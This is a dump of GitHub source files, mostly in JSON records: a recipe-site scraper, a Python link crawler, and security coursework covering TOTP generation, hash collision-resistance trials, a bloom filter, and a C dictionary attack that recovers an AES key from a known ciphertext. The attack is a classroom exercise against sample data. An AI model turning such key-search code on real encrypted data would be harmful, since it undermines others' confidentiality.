"alphanum_fraction": 0.8461538553237915,
"avg_line_length": 38,
"blob_id": "ba8f537e066ac7e9687da2a163df0aa09d51c39a",
"content_id": "84a9f9d56a20d1f9879af6320faf816ecf545e24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 1,
"path": "/README.md",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "Scrape every recipe from bonapetit.com\n"
},
{
"alpha_fraction": 0.6146341562271118,
"alphanum_fraction": 0.6146341562271118,
"avg_line_length": 21.83333396911621,
"blob_id": "bc3013c6b84351a7df8aa40a2c52902660ab00a8",
"content_id": "e561b80f8c9adb15dae5e7d5dc5f9a18b46ee8e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/recipe_finder/site_crawlers/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module crawls through websites that have recipes, and caches recipe pages\nfor later analysis by the html parsers.\n\n\"\"\"\n\nfrom .ba_crawl import BonApetitCrawler\n\nclass DebugContext:\n ba_context = {\n 'site name': 'Bon Apetit',\n 'cache key': 'BA Cache',\n 'url cache key': 'all_urls',\n 'read cache': False,\n 'debug mode': True,\n 'read debug cache': True,\n }"
},
{
"alpha_fraction": 0.5328719615936279,
"alphanum_fraction": 0.5420991778373718,
"avg_line_length": 38.45454406738281,
"blob_id": "4b5bf527a2b81fec404eb7630b9511f47d24f14e",
"content_id": "24701c4d7e8e550ff1b6412c6d8d7189a8e6c628",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 22,
"path": "/recipe_finder/html_parsers/abc_parsers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\n\n\nclass Parser(ABC):\n def __init__(self, cache_info):\n \"\"\"\n Cache info comes in from the site crawler module. It tells this module:\n\n * where to find html pages to parse\n * what are the broad categories that it has pre-sorted html pages\n into (ideally, recipe pages, and not recipe pages)\n * when was the cache last downloaded.\n\n This information comes in via a dictionary; for example:\n\n {'html_dir': the directory\n 'supercats': {'other urls': {'avg_creation_date': datetime object\n 'num_of_files': 3390},\n 'recipe pages': {'avg_creation_date': datetime object,\n 'num_of_files': 8550}}}\n \"\"\"\n self.cache_info = cache_info"
}
] | 14 |
Anorpi/python_spider
|
https://github.com/Anorpi/python_spider
|
b92f508588d64148e63a3a8b9900fcdddb3cb28e
|
bea09d88dfc1889a98fa3151061dab2c4cbf13f0
|
e37ddb1e93ea803edd2378f28a9dc94a68296039
|
refs/heads/master
| 2020-06-23T21:32:43.917310 | 2016-11-27T09:37:41 | 2016-11-27T09:37:41 | 74,635,499 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6992126107215881,
"alphanum_fraction": 0.7023621797561646,
"avg_line_length": 38.625,
"blob_id": "d2c609383b129394a998433e7b4e74959a57b9a8",
"content_id": "1da83646e3669c9272945d404e03de6c85f77e2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 16,
"path": "/findInter.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\n"
},
{
"alpha_fraction": 0.6717612743377686,
"alphanum_fraction": 0.6732168793678284,
"avg_line_length": 31.66666603088379,
"blob_id": "4a1996a31f18ad91b5b7eec30393efa63e2104b9",
"content_id": "3a27a297e54bba70fbfdd3426626812fa5a6a622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1374,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 42,
"path": "/webtest.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList\n#c=input()\nc = 'http://www.google.com'\nprint c\nb=webInter(c)\nprint \"webInter is:\"\nfor x in b:\n print x\n\na=webOuter(c)\nprint \"webOuter is:\"\nfor y in a:\n print y\n\n\n"
},
{
"alpha_fraction": 0.6588628888130188,
"alphanum_fraction": 0.6608695387840271,
"avg_line_length": 32.22222137451172,
"blob_id": "a6042c5dc043a463873e88d24a68b8d2abd163b2",
"content_id": "3eeaf3d063f578b39ff0060d38464871d2d550b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1495,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 45,
"path": "/webprobe.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\nimport urlparse\nfrom bs4 import BeautifulSoup\n\ndef webInter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webInterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n #find 'href' start head '/',at least 2 characters\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^/(?!/)..*\")):\n if newWebUrl is not None:\n\t webInterList.add(urlparse.urlparse(webUrl).scheme + \"://\" + urlparse.urlparse(webUrl).netloc + newWebUrl.attrs['href'])\n\n return webInterList\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList\n#c=input()\nwebUrl = 'http://www.google.com/advanced_search?hl=en&authuser=0'\nprint \"webUrl is:\" + webUrl\nfor x in webInter(webUrl):\n print \"x is:\" + x\n # for xx in webInter(x):\n # print \"xx is:\" + xx\n \n\n#a=webOuter(c)\n#print \"webOuter is:\"\n#for y in a:\n# print y\n#\n#\n"
},
{
"alpha_fraction": 0.6734693646430969,
"alphanum_fraction": 0.6750392317771912,
"avg_line_length": 36.52941131591797,
"blob_id": "139fb72c67ecfe786d2032802184c6fa0c98a0c0",
"content_id": "a122439f1f8d2b76126d6f87cceaad3f504e5869",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 17,
"path": "/findOuter.py",
"repo_name": "Anorpi/python_spider",
"src_encoding": "UTF-8",
"text": "import requests,re\n#import urlparse\nfrom bs4 import BeautifulSoup\n\ndef webOuter(webUrl):\n #add function:judge 'webUrl' parameter if is not a web url\n #add function:judge 'if the newWebUrl link to webUrl,it may make a Infinite loop',\n\n webOuterList = set()\n webSoup = BeautifulSoup(requests.get(webUrl).text, \"lxml\")\n # find 'href' start head 'http' or 'www'\n for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(http|www).*\")):\n # for newWebUrl in webSoup.findAll('a', href=re.compile(\"^(?!/)+.*\")):\n if newWebUrl is not None:\n webOuterList.add(newWebUrl.attrs['href'])\n\n return webOuterList"
}
] | 4 |
lekevin678/Intro-to-Security
|
https://github.com/lekevin678/Intro-to-Security
|
693548cfb34876925bea2f2ca46244186b3a21ca
|
17c5d46461859da60dbb9f46a89541fecf01e777
|
ad27a0e591877da3e2c79756a18961273d592450
|
refs/heads/main
| 2023-01-23T03:46:20.599745 | 2020-12-02T05:57:32 | 2020-12-02T05:57:32 | 317,762,982 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7328519821166992,
"alphanum_fraction": 0.7472923994064331,
"avg_line_length": 20.30769157409668,
"blob_id": "ea1491b66360a9a1695800b2b7e68ca1eb48c40b",
"content_id": "5c20fd05023c62732a810a6829f07d707c7cca92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 13,
"path": "/Google Authenticator TOTP/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Google Authenticator\n\nImplements TOTP (Time-based One Time Password). Generates QR code to scan to use with Google Authenticator.\n\nCompile & Run:\n\n1.) Generate QR\n python3 totp.py generate\n \n2.) Get Code\n python3 totp.py get\n\nSkills: Python, HMAC, Hash, One Time Password\n"
},
{
"alpha_fraction": 0.5116721987724304,
"alphanum_fraction": 0.5331109762191772,
"avg_line_length": 20.84375,
"blob_id": "29b2542fe83a290abbdaaf67021a5728d2486812",
"content_id": "27a72516181a3c8b89de2d92d343cc537abeb4a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 96,
"path": "/Google Authenticator TOTP/totp.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "import sys\nimport math\nimport time\n\nimport hmac\nimport hashlib\nimport base64\nimport struct\n\nimport pyqrcode\n\nclass TOTP:\n\n def getCounter(self):\n currTime = time.time()\n temp = math.floor( (currTime - 0) / self.ga.timeStep)\n return temp\n\n \n def getHash(self):\n key = self.ga.secret\n counter = self.getCounter()\n \n k = base64.b32decode(key)\n counter = struct.pack('>q', counter)\n\n myHash = hmac.new(k, counter, hashlib.sha1)\n myByteArrayHash = bytearray(myHash.digest())\n\n binaryArr = []\n for c in myByteArrayHash:\n bits = bin(c)[2:]\n bits = '00000000'[len(bits):] + bits\n binaryArr.extend([int(b) for b in bits])\n\n binary = \"\"\n for i in binaryArr:\n binary += str(i)\n\n return binary\n\n def truncate(self, s):\n lastFour = s[len(s)-4:]\n\n offset = int(lastFour, 2)\n\n charOffset = (offset * 8) + 1\n return s[charOffset:charOffset+31]\n\n\n def start(self):\n hotp = self.truncate( self.getHash())\n hotp = int(hotp, 2)\n hotp = hotp % (pow(10, 6))\n self.code = '000000'[len(str(hotp)):] + str(hotp)\n self.code = self.code[:3] + \" \" + self.code[3:]\n\n def __init__(self, ga):\n self.ga = ga\n\nclass GoogleAuth:\n\n def generateQR(self):\n s = \"otpauth://totp/Provider1:\" + self.email + \"?secret=\" + self.secret + \"&issuer=Provider1\"\n url = pyqrcode.create(s) \n url.svg(\"QR-Code.svg\", scale = 8) \n\n \n def getOTP(self):\n otp = TOTP(self)\n while True:\n otp.start()\n print(otp.code)\n time.sleep(30)\n \n\n\n def __init__(self, time, length, email, secret):\n self.timeStep = time\n self.passwordLen = length\n self.email = email\n self.secret = secret\n\n\nemail = \"[email protected]\"\nsecret = \"JBSWY3DPEHPK3PXP\"\n\nif len(sys.argv) == 2:\n ga = GoogleAuth(30, 6, email, secret)\n arg = sys.argv[1]\n\n if arg == \"generate\":\n ga.generateQR()\n\n elif arg == \"get\":\n ga.getOTP()\n\n\n"
},
{
"alpha_fraction": 0.7461538314819336,
"alphanum_fraction": 0.7679487466812134,
"avg_line_length": 69.81818389892578,
"blob_id": "a37fb32a9956bcb0529e084020daa8a1d09b8990",
"content_id": "1321d68c66c7b8f7638cb8eb1100461675a6d1b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 570,
"num_lines": 11,
"path": "/Dictionary-Attack/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Dictionary-Attack\n\nYou are given a plaintext and a ciphertext, you know that aes-128-cbc is used to generate the ciphertext from the plaintext, and you also know that the numbers in the IV are all zeros (not the ASCII character ‘0’). Another clue that you have learned is that the key used to encrypt this plaintext is an English word shorter than 16 characters; the word that can be found from a typical English dictionary. Since the word has less than 16 characters (i.e. 128 bits), space characters (hexadecimal value 0x20) are appended to the end of the word to form a key of 128 bits.\nYour goal is to write a program to find out this key.\n\nTo Compile:\n gcc dict_attack.c -o attack -lssl -lcrypto\nTo Run:\n ./attack\n\nSkills: C, Encryption/Decryption, Encryption Modes \n"
},
{
"alpha_fraction": 0.5389497876167297,
"alphanum_fraction": 0.5510675311088562,
"avg_line_length": 26.695999145507812,
"blob_id": "d6a29ccfae863ade9ed09fa32865ed64fb8b55ea",
"content_id": "43cc88601a0efed05dd68c4207722ee007c01da5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3466,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 125,
"path": "/Hash-Resistance-Properties/hash-resistance.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "from cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.backends import default_backend\n\nimport random\nimport string\nimport time\n\nclass Hash:\n def get_random_string(self, randNum):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(randNum))\n return result_str\n\n def find_hash(self, s):\n digest = hashes.Hash(hashes.SHA256(), backend=default_backend())\n digest.update(s)\n temp = digest.finalize()\n hexString = \"\"\n for i in temp:\n hexString = hexString + (i.encode(\"hex\"))\n \n return hexString[0:3]\n\n\nclass Hash_Weak(Hash):\n randS__Key = \"\"\n hash__Key = \"\"\n\n def runTrials(self, i):\n print(\"Run (%d) Key: %s\" % (i , self.hash__Key))\n \n trialNum = 0\n foundMatch = False \n\n while (foundMatch == False):\n randNum = random.randint(2,100);\n randomWord = self.get_random_string(randNum)\n randomHash = self.find_hash(randomWord)\n\n if randomWord==self.randS__Key:\n continue\n\n trialNum += 1\n\n if randomHash==self.hash__Key:\n print(\" *****FOUND MATCH*****\")\n print(\" Strings:\\t%s != %s\" % (self.randS__Key, randomWord))\n print(\" Hashes:\\t%s == %s\" % (self.hash__Key, randomHash ))\n print(\"\\n Number of Trials: %d\\n\" % trialNum )\n foundMatch = True\n \n else:\n continue\n\n return trialNum\n\n def __init__(self):\n randNum = random.randint(2,100);\n self.randS__Key = self.get_random_string(randNum)\n self.hash__Key = self.find_hash(self.randS__Key)\n \nclass Hash_Strong(Hash):\n hashDict = dict()\n\n def runTrials(self, i):\n print(\"Run (%d)\" % (i))\n \n trialNum = 0\n foundMatch = False \n\n while (foundMatch == False):\n randomNum = random.randint(2,100);\n randomWord = self.get_random_string(randomNum)\n randomHash = self.find_hash(randomWord)\n\n if randomHash in self.hashDict:\n if self.hashDict[randomHash]==randomWord:\n continue\n\n trialNum += 1\n end = time.time()\n print(\" *****FOUND MATCH*****\")\n print(\" Trials: %d\" % trialNum )\n foundMatch = True\n \n else:\n trialNum += 1\n self.hashDict[randomHash] = randomWord\n\n self.hashDict.clear()\n return trialNum\n\n\n\nprint(\"HOW MANY TRAILS WILL I TAKE TO BREAK SHA_256 STRONG COLLISION RESISTANCE (ONLY FIRST 24 BITS OF HASH)? \\n\")\ni = 0\nstrong_average = 0\n\nwhile(i < 10):\n i += 1\n one = Hash_Strong()\n strong_average += one.runTrials(i)\n\nstrong_average = strong_average / i\nprint(\"\\n\\nAVERAGE NUMBER OF TRIALS: %d\\n\\n\" % strong_average)\n\n\n\n\n\nprint(\"HOW MANY TRAILS WILL I TAKE TO BREAK SHA_256 WEAK COLLISION RESISTANCE (ONLY FIRST 24 BITS OF HASH)? \\n\")\ni = 0\nweak_average = 0\n\nwhile(i < 10):\n i += 1\n one = Hash_Weak()\n weak_average += one.runTrials(i)\n\nweak_average = weak_average / i\nprint(\"\\n\\nAVERAGE NUMBER OF TRIALS: %d\" % weak_average)\n\n\nprint(\"\\n\\nSTRONG COLLISION RESISTANCE AVERAGE - %d trials\" % strong_average)\nprint(\"WEAK COLLISION RESISTANCE AVERAGE - %d trials\" % weak_average)\n\n\n\n\n"
},
{
"alpha_fraction": 0.7859007716178894,
"alphanum_fraction": 0.8067885041236877,
"avg_line_length": 53.71428680419922,
"blob_id": "ddc422fc2bba58c818aa8c7cb92bd084af729fa1",
"content_id": "79655731d4d5506ee621021770ef943b00320fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 240,
"num_lines": 7,
"path": "/Hash-Resistance-Properties/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Hash-Resistance-Properties\nTest the weak-resistance and strong-resistance properties of SHA-256. Only uses the first 24 bits of the hashes. Both weak-resistance and strong-resistance runs 100 times and the average number of trials to break the property is calculated.\n\nTo Compile and Run:\n python hash-resistance.py\n \nSkills: Python, Object-Oriented Design, Cryptographic Hashes\n"
},
{
"alpha_fraction": 0.5725051760673523,
"alphanum_fraction": 0.6237006187438965,
"avg_line_length": 22.85093116760254,
"blob_id": "5aa0d53d956410f9de444f21dc212ccd15ed9227",
"content_id": "c196c456212df8198c812cead9c47763aa6b4eec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3848,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 161,
"path": "/Bloom Filter/bloom_filter.py",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport string\nimport time\nimport sys\n\ndef hash__SHA1(word):\n m = hashlib.sha1(word)\n return m.hexdigest()\n\ndef hash__SHA256(word):\n m = hashlib.sha256(word)\n return m.hexdigest()\n\ndef hash__SHA3256(word):\n m = hashlib.sha3_256(word)\n return m.hexdigest()\n\ndef hash__MD5(word):\n m = hashlib.md5(word)\n return m.hexdigest()\n\ndef hash__BLAKE2b(word):\n m = hashlib.blake2b(word)\n return m.hexdigest() \n\ndef bloomSetup(bloomFilter__5, bloomFilter__3, bloomLength , f):\n for i in f:\n plainText = i.rstrip()\n hString = hash__SHA1(plainText) \n index_SHA1 = int(hString, 16) % bloomLength\n \n\n hString = hash__SHA256(plainText) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(plainText) \n index_SHA3 = int(hString, 16) % bloomLength\n \n\n hString = hash__MD5(plainText) \n index_MD5 = int(hString, 16) % bloomLength\n \n\n hString = hash__BLAKE2b(plainText) \n index_BLAKE = int(hString, 16) % bloomLength\n\n\n bloomFilter__5[index_SHA1] = 1\n\n bloomFilter__5[index_SHA256] = 1\n bloomFilter__3[index_SHA256] = 1\n\n bloomFilter__5[index_SHA3] = 1\n bloomFilter__3[index_SHA3] = 1\n\n bloomFilter__5[index_MD5] = 1\n bloomFilter__3[index_MD5] = 1\n\n bloomFilter__5[index_BLAKE] = 1\n\ndef bloomCheck__5(bloomFilter__5, bloomLength, s):\n hString = hash__SHA1(s) \n index_SHA1 = int(hString, 16) % bloomLength\n\n hString = hash__SHA256(s) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(s) \n index_SHA3 = int(hString, 16) % bloomLength\n \n hString = hash__MD5(s) \n index_MD5 = int(hString, 16) % bloomLength\n \n hString = hash__BLAKE2b(s) \n index_BLAKE = int(hString, 16) % bloomLength\n\n if(bloomFilter__5[index_SHA1] == 1 and bloomFilter__5[index_SHA256] == 1 and bloomFilter__5[index_SHA3] == 1 and bloomFilter__5[index_MD5] == 1 and bloomFilter__5[index_BLAKE] == 1):\n return 1\n else:\n return 0\n\ndef bloomCheck__3(bloomFilter__3, bloomLength, s):\n hString = hash__SHA256(s) \n index_SHA256 = int(hString, 16) % bloomLength\n\n hString = hash__SHA3256(s) \n index_SHA3 = int(hString, 16) % bloomLength\n \n hString = hash__MD5(s) \n index_MD5 = int(hString, 16) % bloomLength\n\n if(bloomFilter__3[index_SHA256] == 1 and bloomFilter__3[index_SHA3] == 1 and bloomFilter__3[index_MD5] == 1):\n return 1\n else:\n return 0\n\ndictArg = sys.argv[2]\ninputArg = sys.argv[4]\noutput3Arg = sys.argv[6]\noutput5Arg = sys.argv[7]\n\nbloomLength = 2364657\nbloomFilter__5 = [0] * bloomLength\nbloomFilter__3 = [0] * bloomLength\n\ndictionary = open(dictArg, \"r+b\");\nbloomSetup(bloomFilter__5, bloomFilter__3, bloomLength, dictionary)\n\n\n\ninputFile = open(inputArg, \"r+b\")\nnum = int(inputFile.readline().rstrip())\ninputWords = []\n\nfor i in range(num):\n inputWords.append(inputFile.readline().rstrip())\n\nout3 = open(output3Arg, \"w\")\nfor i in inputWords:\n isBad = bloomCheck__3(bloomFilter__3, bloomLength, i)\n\n if (isBad == 1):\n out3.write(\"maybe\\n\")\n else:\n out3.write(\"no\\n\")\n\nout5 = open(output5Arg, \"w\")\nfor i in inputWords:\n isBad = bloomCheck__5(bloomFilter__5, bloomLength, i)\n\n if (isBad == 1):\n out5.write(\"maybe\\n\")\n else:\n out5.write(\"no\\n\")\n\n\n\n\n\n\n#find time for one password\ndictionary.seek(0)\ntest = dictionary.readline().rstrip()\n\nstart = time.time()\nbloomCheck__3(bloomFilter__3, bloomLength, i)\nend = time.time() - start\nprint(\"BLOOMCHECK 3 TIME: \", end='')\nprint(end)\n\n\nstart = time.time()\nbloomCheck__5(bloomFilter__5, bloomLength, i)\nend = time.time() - start\nprint(\"BLOOMCHECK 5 TIME: \", end='')\nprint(end)\n\ndictionary.close()\ninputFile.close()\nout5.close() \nout3.close()\n\n\n \n\n"
},
{
"alpha_fraction": 0.4712907671928406,
"alphanum_fraction": 0.5140101313591003,
"avg_line_length": 20.760000228881836,
"blob_id": "4735b604926fed829d188e1bef5da7f98da6b494",
"content_id": "57d2a6ef389cd6b3902f82fc40d711edde5c6dd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2177,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 100,
"path": "/Dictionary-Attack/dict_attack.c",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <openssl/evp.h>\n\n\nvoid handleErrors(void){\n ERR_print_errors_fp(stderr);\n abort();\n}\n\nvoid encrypt(unsigned char *plaintext, int plaintext_len, unsigned char *key, unsigned char *ciphertext){\n EVP_CIPHER_CTX *ctx;\n\n int len;\n\n\n if(!(ctx = EVP_CIPHER_CTX_new())){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, 0000000000000000)){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, plaintext_len)){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptFinal_ex(ctx, ciphertext + len, &len)){\n printf(\"error\\n\");\n }\n\n EVP_CIPHER_CTX_free(ctx);\n\n}\n\nvoid string2hexString(char* input, char* output){\n int loop;\n int i; \n \n i=0;\n loop=0;\n \n int temp=0;\n while(input[loop] != '\\0')\n {\n temp = (int) input[loop];\n if (temp < 0){\n temp = (128 - abs(temp) ) + 128;\n\n }\n sprintf((char*)(output+i),\"%02x\", temp);\n loop+=1;\n i+=2;\n }\n output[i++] = '\\0';\n}\n\n\nint main(){\n FILE * stream;\n char * key = NULL;\n ssize_t buffer = 0;\n ssize_t read;\n\n stream = fopen(\"words.txt\", \"r\");\n\n unsigned char *plaintext= \"This is a top secret.\";\n unsigned char ciphertext[128];\n\n while ((read = getline(&key, &buffer, stream)) != -1) { \n strtok(key, \"\\n\");\n int addZero = 16 - strlen(key);\n if (addZero > 0){\n int count = 0;\n while (count < addZero){\n strncat(key, \" \", 1); \n count ++;\n }\n }\n\n int ciphertext_len;\n encrypt(plaintext, strlen ((char *)plaintext), key, ciphertext);\n \n char hex_str[64+1];\n string2hexString(ciphertext, hex_str);\n\n char * ciphertextMain = \"8d20e5056a8d24d0462ce74e4904c1b513e10d1df4a2ef2ad4540fae1ca0aaf9\";\n \n if (strcmp(hex_str,ciphertextMain) == 0){\n printf(\"************FOUND KEY**************\\n\");\n printf(\" KEY: '%s'\\n\", key);\n return 0;\n }\n\n }\n fclose(stream);\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7643312215805054,
"alphanum_fraction": 0.774946928024292,
"avg_line_length": 57.875,
"blob_id": "6d6845a6fa361cccbef21f307d4daffe3372fab0",
"content_id": "e73affcd7ed6bee6b4e4b52d77e4a932604c2958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 8,
"path": "/Bloom Filter/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Bloom Filter\n\nCreates two Bloom Filter with a list of words in a dictionary. One Bloom Filter uses 3 hash functions while the other uses 5. Program will test an input file with a list of words to see if a word is either not in the Bloom Filter or if it might be in the Bloom Filter (might due to the posibility of false positives).\n\nCompile and Run:\npython3 bloom_filter.py -d dictionary.txt -i input.txt -o output3.txt output5.txt\n\nSkills: Python, Bloom Filters, Hash\n"
}
] | 8 |
pluxury8state/Yield
|
https://github.com/pluxury8state/Yield
|
a0078b72119f1247ff9441c0133feba8c6785891
|
c2cae9eb47ef3dfcd96b41de6a40aa625f2d8b8f
|
4143e2182d73e666d6e497720959beb318bac8d5
|
refs/heads/master
| 2022-11-09T13:33:13.239553 | 2020-06-25T14:16:25 | 2020-06-25T14:16:25 | 274,934,476 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5815061926841736,
"alphanum_fraction": 0.586272656917572,
"avg_line_length": 20.85416603088379,
"blob_id": "3d403f76f4c297fff9d14249905c169637b25926",
"content_id": "f2e72653ea507a38a45f4c69bb538a6c4f7968d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1049,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 48,
"path": "/search_country.py",
"repo_name": "pluxury8state/Yield",
"src_encoding": "UTF-8",
"text": "from requests import get\nimport json\nfrom pprint import pprint\n\n\ndef convert(file):\n mas = []\n for item in file:\n a = item['name']['common'].replace(' ','_')\n mas.append(a)\n return mas\n\n\nclass ITERATOR:\n\n def __init__(self, file=str):\n self.file = file\n with open(self.file) as inform:\n self.json_load = json.load(inform)\n self.countries = convert(self.json_load)\n self.counter = -1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n url = 'https://ru.wikipedia.org/wiki/'\n if self.counter == len(self.countries)-1:\n raise StopIteration\n self.counter += 1\n\n dictionary = {}\n\n dictionary['name'] = self.countries[self.counter]\n dictionary['link'] = url + self.countries[self.counter]\n\n return dictionary\n\n\nobj = ITERATOR('countries.json')\n\nmas = []\n\nfor items in obj:\n mas.append(items)\n\nwith open('new_links.json', 'w', encoding='utf8') as file:\n json.dump(mas, file, ensure_ascii=False, indent=2)\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6081300973892212,
"avg_line_length": 21.703702926635742,
"blob_id": "9dd0de4545d1128a480e50ac823f4eb96cb1e0a7",
"content_id": "42c5dad10774957b525d354ee9808944c4d1893a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 27,
"path": "/hash_generator.py",
"repo_name": "pluxury8state/Yield",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport json\n\ndef open_file(file_i):\n json_file = None\n with open(str(file_i),encoding='utf8') as file_to_hash:\n json_file = json.load(file_to_hash)\n return json_file\n\ndef hash_file(object):\n\n mas = {}\n counter = 0\n for item in object:\n mas['name'] = item['name']\n hash_object = hashlib.md5(bytes(str(item['link']), encoding='utf8'))\n mas['hash_link'] = hash_object.hexdigest()\n yield mas\n counter += 1\n print(f'всего строк было обработано:{counter}')\n\n\n\nfile = open_file('new_links.json')\n\nfor item in hash_file(file):\n print(item)\n\n\n"
}
] | 2 |
bbuchanan208/VerveDemo
|
https://github.com/bbuchanan208/VerveDemo
|
